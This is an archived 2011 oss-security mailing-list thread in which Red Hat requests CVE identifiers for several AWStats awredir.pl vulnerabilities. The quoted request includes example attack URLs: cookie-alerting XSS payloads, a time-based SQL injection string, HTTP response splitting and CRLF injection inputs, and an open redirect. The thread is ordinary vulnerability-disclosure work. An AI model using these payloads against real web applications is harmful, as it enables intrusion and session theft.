Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 07 Oct 2011 11:33:22 +0200
From: Jan Lieskovsky <jlieskov@...hat.com>
To: "Steven M. Christey" <coley@...us.mitre.org>,
        Petr Lautrbach <plautrba@...hat.com>
CC: oss-security@...ts.openwall.com, MustLive <mustlive@...security.com.ua>
Subject: Re: CVE Request -- Multiple security issues in various
 versions of AWStats


And one correction yet.

Petr Lautrbach (Cc-ed) commented on Red Hat Bugzilla
bug [1], that:

<quote>
 > URL redirection abuse:
 >
 > 
http://site/awredir.pl?key=0f3830803a70cc1636af3548b66ed978&url=http://websecurity.com.ua

awredir.pl is url redirector so this is its main/only feature and it
is/can be secured by $KEYFORMD5. So I don't think this is flaw.
</quote>

Thus explicitly mentioning it here too, so this would not fall out
of the radar and just five CVE ids would be assigned.

Thank you && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team

P.S.: Petr, if you have more comments on the rest of the issues,
       feel free to do so in order to proper set of CVE ids would
       be assigned to these. Thanks, Jan.

On 10/07/2011 10:17 AM, Jan Lieskovsky wrote:
> Hello Josh, Steve, vendors,
>
> these doesn't look like CVE ids have been already assigned for:
> [1] https://bugzilla.redhat.com/show_bug.cgi?id=740926#c0
> [2] http://secunia.com/advisories/46160/
> [3] http://seclists.org/fulldisclosure/2011/Sep/234
> [4] http://websecurity.com.ua/5380/
>
> If I counted correctly, six CVE ids should be assigned for these
> (since different versions are listed as vulnerable):
>
> 1) XSS (WASC-08) (in versions <=1.1):
> http://site/awredir.pl?url=javascript:alert(document.cookie)
>
> 2) Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38):
> http://site/awredir.pl?url=http://websecurity.com.ua
>
> 3) SQL Injection (WASC-19): (version 1.2)
> http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*
>
> 4) XSS (WASC-08) (in version 1.2):
>
> http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C
> /script%3E
>
> http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C
> /script%3E
>
> 5) HTTP Response Splitting (WASC-25):
>
> http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&
> url=%0AHeader:1
>
> 6) CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20):
>
> http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&
> url=%0AText
>
> Could you allocate CVE identifiers for these? (let me know
> if further description of each of the issues is necessary prior
> assignment).
>
> Thank you && Regards, Jan.
> --
> Jan iankko Lieskovsky / Red Hat Security Response Team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.